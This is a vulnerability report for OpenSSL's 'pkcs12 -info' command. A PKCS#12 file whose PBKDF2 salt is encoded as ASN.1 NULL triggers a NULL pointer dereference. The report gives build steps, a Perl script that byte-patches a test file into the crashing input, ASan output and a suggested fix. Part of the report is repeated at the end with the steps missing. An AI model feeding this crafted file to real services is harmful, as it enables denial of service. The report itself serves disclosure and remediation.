Summary / Description
openssl pkcs12 -info crashes on a malformed PBMAC1-based PKCS#12 file when the embedded PBKDF2 salt is encoded as ASN.1 NULL. The CLI info path decodes PBKDF2PARAM and unconditionally reads pbkdf2_param->salt->value.octet_string, but does not validate that the salt field is actually an OCTET STRING.
Affected Product
OpenSSL 4.1.0-dev
Severity
Low
Steps to Reproduce
- Build an ASan version of the tree:
cd /tmp
git clone --depth=1 https://github.com/openssl/openssl openssl-asan
cd /tmp/openssl-asan
make distclean
./config enable-asan no-shared
make include/openssl/opensslv.h
make -j4 apps/openssl
- Create a malformed PKCS#12 by modifying the bundled good PBMAC1 test file so the PBKDF2 salt becomes ASN.1 NULL:
perl -e '
use strict; use warnings;
my $in = "test/recipes/80-test_pkcs12_data/pbmac1_256_256.good.p12";
my $out = "/tmp/pbmac1_null_salt.p12";
open my $fh, "<:raw", $in or die $!;
local $/; my $d = <$fh>; close $fh;
substr($d,2,2)=pack("C2",0x0a,0x82);
substr($d,2577,1)=pack("C",0x74);
substr($d,2579,1)=pack("C",0x65);
substr($d,2581,1)=pack("C",0x41);
substr($d,2594,1)=pack("C",0x34);
substr($d,2596,1)=pack("C",0x24);
substr($d,2609,1)=pack("C",0x17);
substr($d,2610,2)=pack("C2",0x05,0x00);
substr($d,2612,8)="";
open my $oh, ">:raw", $out or die $!;
print {$oh} $d; close $oh;
'
- Trigger the bug:
ASAN_OPTIONS=detect_leaks=0 \
OPENSSL_MODULES=/tmp/openssl-asan/providers \
/tmp/openssl-asan/apps/openssl pkcs12 \
-in /tmp/pbmac1_null_salt.p12 -info -noout -passin pass:any
ASan Evidence
MAC: PBMAC1 using PBKDF2, Iteration 2048
AddressSanitizer:DEADLYSIGNAL
=================================================================
==67310==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x56123a9d6a2a bp 0x7ffdef20e6b0 sp 0x7ffdef20d1b8 T0)
==67310==The signal is caused by a READ memory access.
==67310==Hint: address points to the zero page.
#0 0x56123a9d6a2a in ASN1_STRING_length crypto/asn1/asn1_lib.c:407
#1 0x56123a74b0a4 in pkcs12_main apps/pkcs12.c:834
#2 0x56123a73e97f in do_cmd apps/openssl.c:525
#3 0x56123a6e3a13 in main apps/openssl.c:368
#4 0x7f45bcc641c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#5 0x7f45bcc6428a in __libc_start_main_impl ../csu/libc-start.c:360
#6 0x56123a6eebb4 in _start (/tmp/openssl-asan/apps/openssl+0x32ebb4) (BuildId: 235f4d2b90b98e43e3794d1d329a2a99a99b58de)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV crypto/asn1/asn1_lib.c:407 in ASN1_STRING_length
==67310==ABORTING
Impact
Any workflow that runs openssl pkcs12 -info on attacker-supplied PKCS#12 files can be crashed with a NULL pointer dereference, causing denial
of service. No valid password is required.
Remediation
Before printing PBMAC1 details, validate that:
- pbkdf2_param->salt != NULL
- pbkdf2_param->salt->type == V_ASN1_OCTET_STRING
- pbkdf2_param->salt->value.octet_string != NULL
The simplest fix is to reuse the same salt validation logic already present in crypto/pkcs12/p12_mutl.c:142
Summary / Description
openssl pkcs12 -info crashes on a malformed PBMAC1-based PKCS#12 file when the embedded PBKDF2 salt is encoded as ASN.1 NULL. The CLI info path decodes PBKDF2PARAM and unconditionally reads pbkdf2_param->salt->value.octet_string, but does not validate that the salt field is actually an OCTET STRING.
Affected Product
OpenSSL 4.1.0-dev
Severity
Low
Steps to Reproduce
ASan Evidence
Impact
Any workflow that runs openssl pkcs12 -info on attacker-supplied PKCS#12 files can be crashed with a NULL pointer dereference, causing denial
of service. No valid password is required.
Remediation
Before printing PBMAC1 details, validate that:
The simplest fix is to reuse the same salt validation logic already present in crypto/pkcs12/p12_mutl.c:142